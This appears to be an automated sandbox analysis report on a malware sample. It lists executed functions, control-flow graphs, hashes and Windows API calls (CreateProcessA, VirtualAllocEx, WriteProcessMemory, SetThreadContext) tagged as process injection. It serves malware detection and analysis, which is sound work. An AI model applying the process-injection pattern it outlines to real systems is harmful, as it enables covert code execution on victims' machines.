14353->14334 14355 56e1bf0 VirtualAllocEx 14354->14355 14357 56e1c6d 14355->14357 14357->14275 14359 56e1c30 VirtualAllocEx 14358->14359 14361 56e1c6d 14359->14361 14361->14275 14363 56e1ee1 CreateProcessA 14362->14363 14365 56e20a3 14363->14365 14367 56e50b5 14366->14367 14369 56e1b18 SetThreadContext 14367->14369 14370 56e1b12 SetThreadContext 14367->14370 14368 56e50cb 14368->14287 14369->14368 14370->14368 14372 56e50b5 14371->14372 14374 56e1b18 SetThreadContext 14372->14374 14375 56e1b12 SetThreadContext 14372->14375 14373 56e50cb 14373->14287 14374->14373 14375->14373 14377 56e22e3 ReadProcessMemory 14376->14377 14379 56e2327 14377->14379 14379->14313 14381 56e2298 ReadProcessMemory 14380->14381 14383 56e2327 14381->14383 14383->14313 14384 11a1ee8 14385 11a1efc 14384->14385 14386 11a1f05 14385->14386 14388 11a212a 14385->14388 14395 11a2388 14388->14395 14400 11a2326 14388->14400 14404 11a2201 14388->14404 14408 11a2210 14388->14408 14412 11a230c 14388->14412 14389 11a2133 14389->14386 14396 11a238e 14395->14396 14416 11a28d0 14396->14416 14420 11a28c1 14396->14420 14397 11a23a0 14397->14389 14401 11a2339 14400->14401 14402 11a234b 14400->14402 14428 11a260a 14401->14428 14405 11a2254 14404->14405 14406 11a234b 14405->14406 14407 11a260a 2 API calls 14405->14407 14407->14406 14409 11a2254 14408->14409 14410 11a234b 14409->14410 14411 11a260a 2 API calls 14409->14411 14411->14410 14413 11a22bf 14412->14413 14413->14412 14414 11a234b 14413->14414 14415 11a260a 2 API calls 14413->14415 14415->14414 14417 11a28de 14416->14417 14424 11a2909 14417->14424 14418 11a28ee 14418->14397 14421 11a28de 14420->14421 14423 11a2909 RtlEncodePointer 14421->14423 14422 11a28ee 14422->14397 14423->14422 14425 11a2951 14424->14425 14426 11a2977 RtlEncodePointer 14425->14426 14427 11a29a0 14425->14427 14426->14427 14427->14418 14429 11a2626 14428->14429 14433 11a2668 14429->14433 14437 11a2658 14429->14437 14430 11a2636 14430->14402 14434 11a26a2 14433->14434 14435 11a26cc RtlEncodePointer 14434->14435 14436 11a26f5 14434->14436 14435->14436 14436->14430 14438 11a26a2 14437->14438 14439 11a26cc RtlEncodePointer 14438->14439 14440 11a26f5 14438->14440 14439->14440 14440->14430

                                                                                                                                Executed Functions

                                                                                                                                Function 056E152F Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 134 56e152f-56e1538 135 56e153a-56e156b 134->135 136 56e14e2-56e1510 134->136 139 56e156d 135->139 140 56e1572-56e1593 135->140 141 56e1517-56e152c 136->141 142 56e1512 136->142 139->140 143 56e1676-56e1685 140->143 142->141 144 56e15a2-56e15a7 143->144 146 56e1623-56e1632 144->146 147 56e15b0-56e15b5 146->147 148 56e15cd-56e15d5 147->148 149 56e15b7-56e15c4 148->149 149->148 150 56e15c6 149->150 150->143 150->146 150->148 151 56e16af-56e16b0 150->151 152 56e168a-56e1693 150->152 153 56e15e8-56e15f1 150->153 154 56e16a9-56e16aa 150->154 155 56e17a9-56e17b2 150->155 156 56e1607-56e1610 150->156 157 56e1747-56e17a4 150->157 158 56e1604-56e1605 150->158 159 56e165c-56e166b 150->159 160 56e163d-56e1646 150->160 161 56e15d7-56e15e6 150->161 162 56e1637-56e1638 150->162 163 56e16b5-56e16e0 call 56e092c call 56e0938 150->163 164 56e1670-56e1671 150->164 151->155 166 56e169c-56e16a4 152->166 167 56e1695 152->167 169 56e15fa-56e1602 153->169 170 56e15f3 153->170 171 56e1619-56e1621 156->171 172 56e1612 156->172 158->147 165 56e15a9-56e15ae 159->165 173 56e164f-56e1657 160->173 174 56e1648 160->174 161->149 162->165 180 56e16ea 163->180 181 56e16e2-56e16e8 163->181 164->144 165->161 166->144 167->151 167->155 167->157 167->163 167->166 169->149 170->143 170->146 170->151 170->152 170->154 170->155 170->156 170->157 170->159 170->160 170->162 170->163 170->164 170->169 171->147 172->143 172->151 172->152 172->154 172->155 172->157 172->159 172->160 172->163 172->164 172->171 173->165 174->143 174->151 174->152 174->154 174->155 174->157 174->163 174->173 183 56e16ed-56e1705 180->183 181->183 188 56e170d-56e1722 183->188 189 56e172c 188->189 190 56e1724-56e172a 188->190 191 56e172f-56e1742 189->191 190->191
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F$G$H$J
                                                                                                                                • API String ID: 0-4200722813
                                                                                                                                • Opcode ID: 70503fa80724cd7f3731f5ba4475dfc2119d5bc69d528b060d0daf88bd468c9d
                                                                                                                                • Instruction ID: ea706dbd8bcdcee219c6488b8e648fba821c62b3af1a82d8064454d039f645ab
                                                                                                                                • Opcode Fuzzy Hash: 70503fa80724cd7f3731f5ba4475dfc2119d5bc69d528b060d0daf88bd468c9d
                                                                                                                                • Instruction Fuzzy Hash: 4B8128B4D06209CFCB04CFA9D885AEDBBB6FF4A310F149269D416AB394C7349942DF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E4A80 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 259 56e4a80-56e4a9a 260 56e4a9c 259->260 261 56e4aa1-56e4acc 259->261 260->261 263 56e4acf-56e4ad5 261->263 264 56e4ade-56e4adf 263->264 265 56e4ad7 263->265 266 56e4ae1-56e4afc 264->266 265->266 267 56e4bed-56e4bf6 265->267 268 56e4caa-56e4cc7 265->268 269 56e4d6a-56e4d8b 265->269 270 56e4deb-56e4dfa 265->270 271 56e4de8-56e4de9 265->271 272 56e4b68-56e4b77 265->272 273 56e4c28-56e4c31 265->273 274 56e4ca7-56e4ca8 265->274 275 56e4b24-56e4b2d 265->275 276 56e4de5-56e4de6 265->276 277 56e4b62-56e4b63 265->277 278 56e4dff-56e4e00 265->278 279 56e4e7c-56e4e94 265->279 280 56e4b79-56e4b88 265->280 281 56e4c77-56e4c94 265->281 282 56e4e35-56e4e44 265->282 283 56e4db5-56e4db6 265->283 284 56e4cf2-56e4cfb 265->284 285 56e4d31-56e4d4c 265->285 286 56e4dcf-56e4dd0 265->286 287 56e4e4c-56e4e69 265->287 288 56e4c0c-56e4c0d 265->288 289 56e4b8a-56e4ba7 265->289 290 56e4dc9-56e4dca 265->290 291 56e4b49-56e4e4a 265->291 292 56e4b46-56e4b47 265->292 293 56e4e02-56e4e22 265->293 294 56e4b40-56e4b41 265->294 295 56e4d9e-56e4d9f 265->295 296 56e4b5c-56e4b5d 265->296 297 56e4d1d-56e4d2c 265->297 298 56e4d5d-56e4d65 265->298 299 56e4cda-56e4ce3 265->299 300 56e4dd8-56e4de0 265->300 301 56e4b56-56e4b57 265->301 302 56e4e97-56e4eaf 265->302 303 56e4d17-56e4d18 265->303 304 56e4dd5-56e4dd6 265->304 305 56e4c15-56e4c23 265->305 306 56e4c12-56e4c13 265->306 307 56e4d11-56e4d12 265->307 338 56e4aff call 56e4fa8 266->338 339 56e4aff call 56e4f99 266->339 330 56e4bff-56e4c07 267->330 331 56e4bf8 267->331 309 56e4b0f-56e4b15 268->309 314 56e4ccd-56e4cd5 268->314 269->309 320 56e4d91-56e4d99 269->320 270->309 271->287 272->309 310 56e4c3a-56e4c42 273->310 311 56e4c33 273->311 313 56e4c47-56e4c64 274->313 325 56e4b2f 275->325 326 56e4b36-56e4b3e 275->326 276->293 277->281 278->282 280->309 281->309 312 56e4c9a-56e4ca2 281->312 282->309 308 56e4db8-56e4dc4 283->308 317 56e4cfd 284->317 318 56e4d04-56e4d0c 284->318 285->309 319 56e4d52-56e4d58 285->319 286->313 287->309 322 56e4e6f-56e4e77 287->322 288->308 289->309 329 56e4bad-56e4bb5 289->329 290->313 291->287 292->280 293->309 321 56e4e28-56e4e30 293->321 294->281 295->308 328 56e4da1-56e4db0 296->328 297->309 315 56e4cec-56e4ced 299->315 316 56e4ce5 299->316 301->289 302->263 324 56e4eb5-56e4ebb 302->324 303->300 304->287 305->309 306->281 307->289 308->309 334 56e4b1e-56e4b1f 309->334 335 56e4b17 309->335 310->309 310->313 311->267 311->269 311->273 311->279 311->280 311->283 311->286 311->300 311->305 311->313 312->309 313->309 332 56e4c6a-56e4c72 313->332 314->309 315->284 315->328 316->269 316->273 316->279 316->284 316->286 316->300 316->305 317->269 317->279 317->305 317->307 318->307 318->309 319->309 320->309 321->309 322->309 324->263 325->267 325->269 325->273 325->275 325->279 325->280 325->282 325->283 325->284 325->286 325->293 325->294 325->300 325->301 325->305 326->294 326->309 328->309 329->309 330->288 330->309 331->267 331->269 331->273 331->275 331->279 331->280 331->283 331->286 331->288 331->293 331->300 331->301 331->305 332->309 334->274 334->275 335->267 335->268 335->269 335->270 335->271 335->272 335->273 335->274 335->275 335->276 335->277 335->278 335->279 335->280 335->281 335->282 335->283 335->284 335->285 335->286 335->287 335->288 335->289 335->290 335->291 335->292 335->293 335->294 335->295 335->296 335->297 335->298 335->299 335->300 335->301 335->303 335->304 335->305 335->306 335->307 337 56e4b05-56e4b0d 337->309 338->337 339->337
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$H
                                                                                                                                • API String ID: 0-1298621336
                                                                                                                                • Opcode ID: cde310bb81c99884ae070783a5746e20b5b5240051e50d07e89c7df2318fcace
                                                                                                                                • Instruction ID: 3b778ef9dbc7a9cb36978fb5611d189f0feedaf8b9e8a7c947ed73ed936f25bc
                                                                                                                                • Opcode Fuzzy Hash: cde310bb81c99884ae070783a5746e20b5b5240051e50d07e89c7df2318fcace
                                                                                                                                • Instruction Fuzzy Hash: D4B10570D0B208CBDF10CFB9D648BEEBBB6BB4A316F105119D419AB291DBB55946CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E4A72 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 340 56e4a72-56e4a9a 342 56e4a9c 340->342 343 56e4aa1-56e4acc 340->343 342->343 345 56e4acf-56e4ad5 343->345 346 56e4ade-56e4adf 345->346 347 56e4ad7 345->347 348 56e4ae1-56e4afc 346->348 347->348 349 56e4bed-56e4bf6 347->349 350 56e4caa-56e4cc7 347->350 351 56e4d6a-56e4d8b 347->351 352 56e4deb-56e4dfa 347->352 353 56e4de8-56e4de9 347->353 354 56e4b68-56e4b77 347->354 355 56e4c28-56e4c31 347->355 356 56e4ca7-56e4ca8 347->356 357 56e4b24-56e4b2d 347->357 358 56e4de5-56e4de6 347->358 359 56e4b62-56e4b63 347->359 360 56e4dff-56e4e00 347->360 361 56e4e7c-56e4e94 347->361 362 56e4b79-56e4b88 347->362 363 56e4c77-56e4c94 347->363 364 56e4e35-56e4e44 347->364 365 56e4db5-56e4db6 347->365 366 56e4cf2-56e4cfb 347->366 367 56e4d31-56e4d4c 347->367 368 56e4dcf-56e4dd0 347->368 369 56e4e4c-56e4e69 347->369 370 56e4c0c-56e4c0d 347->370 371 56e4b8a-56e4ba7 347->371 372 56e4dc9-56e4dca 347->372 373 56e4b49-56e4e4a 347->373 374 56e4b46-56e4b47 347->374 375 56e4e02-56e4e22 347->375 376 56e4b40-56e4b41 347->376 377 56e4d9e-56e4d9f 347->377 378 56e4b5c-56e4b5d 347->378 379 56e4d1d-56e4d2c 347->379 380 56e4d5d-56e4d65 347->380 381 56e4cda-56e4ce3 347->381 382 56e4dd8-56e4de0 347->382 383 56e4b56-56e4b57 347->383 384 56e4e97-56e4eaf 347->384 385 56e4d17-56e4d18 347->385 386 56e4dd5-56e4dd6 347->386 387 56e4c15-56e4c23 347->387 388 56e4c12-56e4c13 347->388 389 56e4d11-56e4d12 347->389 420 56e4aff call 56e4fa8 348->420 421 56e4aff call 56e4f99 348->421 412 56e4bff-56e4c07 349->412 413 56e4bf8 349->413 391 56e4b0f-56e4b15 350->391 396 56e4ccd-56e4cd5 350->396 351->391 402 56e4d91-56e4d99 351->402 352->391 353->369 354->391 392 56e4c3a-56e4c42 355->392 393 56e4c33 355->393 395 56e4c47-56e4c64 356->395 407 56e4b2f 357->407 408 56e4b36-56e4b3e 357->408 358->375 359->363 360->364 362->391 363->391 394 56e4c9a-56e4ca2 363->394 364->391 390 56e4db8-56e4dc4 365->390 399 56e4cfd 366->399 400 56e4d04-56e4d0c 366->400 367->391 401 56e4d52-56e4d58 367->401 368->395 369->391 404 56e4e6f-56e4e77 369->404 370->390 371->391 411 56e4bad-56e4bb5 371->411 372->395 373->369 374->362 375->391 403 56e4e28-56e4e30 375->403 376->363 377->390 410 56e4da1-56e4db0 378->410 379->391 397 56e4cec-56e4ced 381->397 398 56e4ce5 381->398 383->371 384->345 406 56e4eb5-56e4ebb 384->406 385->382 386->369 387->391 388->363 389->371 390->391 416 56e4b1e-56e4b1f 391->416 417 56e4b17 391->417 392->391 392->395 393->349 393->351 393->355 393->361 393->362 393->365 393->368 393->382 393->387 393->395 394->391 395->391 414 56e4c6a-56e4c72 395->414 396->391 397->366 397->410 398->351 398->355 398->361 398->366 398->368 398->382 398->387 399->351 399->361 399->387 399->389 400->389 400->391 401->391 402->391 403->391 404->391 406->345 407->349 407->351 407->355 407->357 407->361 407->362 407->364 407->365 407->366 407->368 407->375 407->376 407->382 407->383 407->387 408->376 408->391 410->391 411->391 412->370 412->391 413->349 413->351 413->355 413->357 413->361 413->362 413->365 413->368 413->370 413->375 413->382 413->383 413->387 414->391 416->356 416->357 417->349 417->350 417->351 417->352 417->353 417->354 417->355 417->356 417->357 417->358 417->359 417->360 417->361 417->362 417->363 417->364 417->365 417->366 417->367 417->368 417->369 417->370 417->371 417->372 417->373 417->374 417->375 417->376 417->377 417->378 417->379 417->380 417->381 417->382 417->383 417->385 417->386 417->387 417->388 417->389 419 56e4b05-56e4b0d 419->391 420->419 421->419
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$H
                                                                                                                                • API String ID: 0-1298621336
                                                                                                                                • Opcode ID: df7ee1fd0d3e6f3079047c471c03e77a0398432fadbfffb826577b6fff6e064d
                                                                                                                                • Instruction ID: ce302422795ca2de608d0537c430bec5900beb33ac42f86b8418f204c74227db
                                                                                                                                • Opcode Fuzzy Hash: df7ee1fd0d3e6f3079047c471c03e77a0398432fadbfffb826577b6fff6e064d
                                                                                                                                • Instruction Fuzzy Hash: 91A13570D0B208CFDF10CFA9D548BEEBBB6BB4A316F109129D419AB291DBB55946CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5398 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E53FF
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5444
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E54AF
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E54F9
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5539
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E557F
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E55C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 59df3355891f0143b38a0a5e0b06f53e74566e1d0007027a5faafcbf06712c02
                                                                                                                                • Instruction ID: 399f6b7cf0fa60619a5971d4122776b23cce5c9a4e0216d6e600351ff8aef679
                                                                                                                                • Opcode Fuzzy Hash: 59df3355891f0143b38a0a5e0b06f53e74566e1d0007027a5faafcbf06712c02
                                                                                                                                • Instruction Fuzzy Hash: 618118B4D06208DFDB10CFA8E58879CFBF1AB18319F24810AE85AB7750D7795985CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E5383 Relevance: 10.7, APIs: 7, Instructions: 173COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 39 56e5383-56e5390 40 56e5355-56e5364 39->40 41 56e5392-56e53db 39->41 46 56e536e 40->46 47 56e5366 40->47 44 56e5629-56e5644 41->44 45 56e53e1-56e5413 RtlDecodePointer 41->45 49 56e541c-56e5458 RtlDecodePointer 45->49 50 56e5415-56e541b 45->50 46->39 47->46 51 56e545a-56e5460 49->51 52 56e5461-56e546e 49->52 50->49 51->52 53 56e5474-56e5478 52->53 54 56e5603-56e5626 52->54 53->54 56 56e547e-56e5480 53->56 54->44 56->54 59 56e5486-56e5489 56->59 60 56e548c-56e5491 59->60 62 56e54d7-56e54d9 60->62 63 56e5493-56e54c3 RtlEncodePointer 60->63 62->54 67 56e54df-56e550d RtlDecodePointer 62->67 64 56e54cc-56e54d5 63->64 65 56e54c5-56e54cb 63->65 64->60 64->62 65->64 68 56e550f-56e5515 67->68 69 56e5516-56e554d RtlEncodePointer 67->69 68->69 70 56e554f-56e5555 69->70 71 56e5556-56e5593 RtlDecodePointer 69->71 70->71 76 56e559c-56e55d7 RtlDecodePointer 71->76 77 56e5595-56e559b 71->77 78 56e55d9-56e55df 76->78 79 56e55e0-56e55e9 76->79 77->76 78->79 81 56e55eb-56e55ee 79->81 82 56e55f4-56e55fe 79->82 81->60 81->82 82->60
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E53FF
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5444
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E54AF
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E54F9
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5539
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E557F
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E55C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 978fb388cb1e187ad4691465df0002a6c11c454e5503e7091b69aff907dec235
                                                                                                                                • Instruction ID: 467d97f93c21d0f4555acad6dd3231b5b4d8dfbd14d482e4a3162ad3a830d742
                                                                                                                                • Opcode Fuzzy Hash: 978fb388cb1e187ad4691465df0002a6c11c454e5503e7091b69aff907dec235
                                                                                                                                • Instruction Fuzzy Hash: 21813A70D06348DFDB11CFA8D58878CBFF1AB28319F24814AE84AA7750D7794885CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 011A2909 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 245 11a2909-11a2958 call 11a2740 call 11a2798 250 11a295a-11a295c 245->250 251 11a295e 245->251 252 11a2963-11a296b 250->252 251->252 253 11a296d-11a299e RtlEncodePointer 252->253 254 11a29c7-11a29d9 252->254 256 11a29a0-11a29a6 253->256 257 11a29a7-11a29bd 253->257 256->257 257->254
                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 011A298D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_11a0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID: [>9[>9
                                                                                                                                • API String ID: 2118026453-3003199868
                                                                                                                                • Opcode ID: 9fc6a6eb9423d2755c35fd738f9cdc847663cfc0621b002f1ff0f7977f61bd1d
                                                                                                                                • Instruction ID: 8b44f1e05d03e762fd61bb67820fcbac88463503389a0a8ac936d393e86655d1
                                                                                                                                • Opcode Fuzzy Hash: 9fc6a6eb9423d2755c35fd738f9cdc847663cfc0621b002f1ff0f7977f61bd1d
                                                                                                                                • Instruction Fuzzy Hash: F7219AB59003598FDB60CFA9D9487DEBFF4EB18314F208429D449B3600E379A649CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1E58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 422 56e1e58-56e1eed 424 56e1eef-56e1ef9 422->424 425 56e1f26-56e1f46 422->425 424->425 426 56e1efb-56e1efd 424->426 430 56e1f7f-56e1fae 425->430 431 56e1f48-56e1f52 425->431 428 56e1eff-56e1f09 426->428 429 56e1f20-56e1f23 426->429 432 56e1f0d-56e1f1c 428->432 433 56e1f0b 428->433 429->425 439 56e1fe7-56e20a1 CreateProcessA 430->439 440 56e1fb0-56e1fba 430->440 431->430 435 56e1f54-56e1f56 431->435 432->432 434 56e1f1e 432->434 433->432 434->429 436 56e1f58-56e1f62 435->436 437 56e1f79-56e1f7c 435->437 441 56e1f66-56e1f75 436->441 442 56e1f64 436->442 437->430 453 56e20aa-56e2130 439->453 454 56e20a3-56e20a9 439->454 440->439 443 56e1fbc-56e1fbe 440->443 441->441 444 56e1f77 441->444 442->441 445 56e1fc0-56e1fca 443->445 446 56e1fe1-56e1fe4 443->446 444->437 448 56e1fce-56e1fdd 445->448 449 56e1fcc 445->449 446->439 448->448 450 56e1fdf 448->450 449->448 450->446 464 56e2132-56e2136 453->464 465 56e2140-56e2144 453->465 454->453 464->465 466 56e2138 464->466 467 56e2146-56e214a 465->467 468 56e2154-56e2158 465->468 466->465 467->468 469 56e214c 467->469 470 56e215a-56e215e 468->470 471 56e2168-56e216c 468->471 469->468 470->471 472 56e2160 470->472 473 56e217e-56e2185 471->473 474 56e216e-56e2174 471->474 472->471 475 56e219c 473->475 476 56e2187-56e2196 473->476 474->473 478 56e219d 475->478 476->475 478->478
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056E208E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: bb89e4b2c0b0965e28eb4e932f12d77cf4a7f45b3f8463c9bf2ebeb0f349f7ab
                                                                                                                                • Instruction ID: aba8ef903008bf1b5c9f395c8a260396df00de3817aa436f0f0f04e692ca9c59
                                                                                                                                • Opcode Fuzzy Hash: bb89e4b2c0b0965e28eb4e932f12d77cf4a7f45b3f8463c9bf2ebeb0f349f7ab
                                                                                                                                • Instruction Fuzzy Hash: 94914C71D01219DFDB10CFA8C885BEDBBF2BB49314F1485A9E819A7380DB749A85CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1CAA Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 479 56e1caa-56e1cfe 482 56e1d0e-56e1d4d WriteProcessMemory 479->482 483 56e1d00-56e1d0c 479->483 485 56e1d4f-56e1d55 482->485 486 56e1d56-56e1d86 482->486 483->482 485->486
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056E1D40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: 0a44f9a6321abed2ac2b147850ac50dfe384b83dcfe84d53bf956e4f7ba1a1b9
                                                                                                                                • Instruction ID: ad54a303c6e6029346d5d838517afc848d8ee99fe377f0f0b120b89756855631
                                                                                                                                • Opcode Fuzzy Hash: 0a44f9a6321abed2ac2b147850ac50dfe384b83dcfe84d53bf956e4f7ba1a1b9
                                                                                                                                • Instruction Fuzzy Hash: 302148719013099FCB10CFA9C8807DEBBF5FF48314F50842AE959A7640D778A940CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E1CB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 490 56e1cb0-56e1cfe 492 56e1d0e-56e1d4d WriteProcessMemory 490->492 493 56e1d00-56e1d0c 490->493 495 56e1d4f-56e1d55 492->495 496 56e1d56-56e1d86 492->496 493->492 495->496
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056E1D40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: fdc1e3ef8a3f33a00ebe0473d1ebaa284365f8c6f42d1ca8a3273e8b06da2980
                                                                                                                                • Instruction ID: 97de14fb2cce6c2c77adab1154dcab93cf9fbd50115f680de255dfdd55d7275e
                                                                                                                                • Opcode Fuzzy Hash: fdc1e3ef8a3f33a00ebe0473d1ebaa284365f8c6f42d1ca8a3273e8b06da2980
                                                                                                                                • Instruction Fuzzy Hash: BA2127719013199FCB10CFAAC884BDEBBF5FF48314F10842AE959A7240D778A944DBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 056E2290 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 500 56e2290-56e2325 ReadProcessMemory 504 56e232e-56e235e 500->504 505 56e2327-56e232d 500->505 505->504
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056E2318
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: f0bb42b1c62323c20c8f2e232bd005804b04cbfe7051cd7cd815dede39136e54
                                                                                                                                • Instruction ID: 24aefd4cd5265a06123be9480e8a644b465b3066f458cf5d644e2af3088a235f
